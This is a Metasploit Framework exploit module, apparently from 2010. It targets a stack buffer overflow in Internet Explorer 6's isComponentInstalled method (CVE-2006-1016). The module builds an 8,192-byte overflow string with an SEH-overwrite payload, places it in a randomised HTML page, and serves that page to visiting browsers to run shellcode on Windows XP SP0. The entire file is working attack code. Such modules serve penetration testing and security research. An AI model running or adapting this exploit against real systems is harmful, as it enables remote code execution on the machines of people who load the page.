### $Id: ie_iscomponentinstalled.rb 9262 2010-05-09 17:45:00Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##
require 'msf/core'class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Seh
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,'Name' => 'Internet Explorer isComponentInstalled Overflow','Description'=> %q{
This module exploits a stack buffer overflow in Internet Explorer. This bug was
patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.},'License'=> MSF_LICENSE,'Author' =>
['hdm',],'Version'=> '$Revision: 9262 $','References' =>
[['CVE','2006-1016'],['OSVDB','31647'],['BID','16870'],],'Payload'=>
{'Space'=> 512,'BadChars' => "\x00\x5c\x0a\x0d\x22",'StackAdjustment' => -3500,},'Platform' => 'win','Targets'=>
[['Windows XP SP0 with Internet Explorer 6.0',{'Ret' =>0x71ab8e4a }]],'DefaultTarget'=> 0,'DisclosureDate' => 'Feb 24 2006'))end
def on_request_uri(cli, request)# Re-generate the payloadreturnif((p = regenerate_payload(cli)) == nil)# Create the overflow string
pattern = rand_text_alpha(8192)# Smash the return address with a bogus pointer
pattern[744, 4] = [0xffffffff].pack('V')# Handle the exception :-)
seh = generate_seh_payload(target.ret)
pattern[6439, seh.length] = seh
# Build out the HTML response page
var_client = rand_text_alpha(rand(30)+2)
var_html = rand_text_alpha(rand(30)+2)
content = %Q|
<html>
<head>
<script>
function window.onload(){#{var_client}.style.behavior = "url(#default#clientCaps)";#{var_client}.isComponentInstalled( "__pattern__" ,"componentid" );}
</script>
</head>
<body id="#{var_client}">
#{var_html}
</body>
</html>
|
content = Rex::Text.randomize_space(content)# Insert the shellcode
content.gsub!('__pattern__', pattern)
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")# Transmit the response to the client
send_response_html(cli, content)# Handle the payload
handler(cli)endend